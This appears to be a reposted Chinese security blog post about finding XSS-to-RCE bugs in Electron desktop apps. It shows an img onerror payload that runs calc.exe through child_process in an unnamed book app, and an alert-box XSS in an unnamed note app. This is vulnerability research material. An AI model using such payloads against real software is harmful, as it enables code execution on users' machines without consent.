有手就能捡到的0day漏洞

admin 2023年12月19日09:48:06评论38 views字数 578阅读1分55秒阅读模式

有手就能捡到的0day漏洞

前言

CFW跑路事件闹得沸沸扬扬,在群里看到有搞安全的小伙伴吐槽了下CFW经常出洞,于是想到了去年那个CFW RCE,那个洞和之前蚁剑RCE一样的,都是基于electron组件的XSS2RCE,原理其实没啥好说的。总结一下就是如果你遇到了gui好看的windows应用,那么只要其功能有框你就插,有参数你就改即可
所以,理论上来讲,只要用了electron(旧版本)组件开发的应用都会存在这个漏洞呢?带着这个疑问,我找到了electron官网的客户案例:

http://www.electronjs.org/apps

全测是不可能全测的,也没必要全测,也可以通过搜索引擎找到使用了electron组件的国产应用来测。

漏洞1-某图书软件

有手就能捡到的0day漏洞

xss2rce的payload:

<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

导入以后,直接点击即可触发:

有手就能捡到的0day漏洞

漏洞2-某云笔记

有手就能捡到的0day漏洞

xss的payload:

<img src=x onerror="javascript:alert(/xss/)">

没想到的是移动端也能弹(指定是非electron问题了):

有手就能捡到的0day漏洞

xss2rce没成功,应该是有沙箱,逆向师傅也没分析出个所以然,所以,到此为止。

原文始发于微信公众号(山海之关):有手就能捡到的0day漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月19日09:48:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   有手就能捡到的0day漏洞http://cn-sec.com/archives/2240058.html

发表评论

匿名网友 填写信息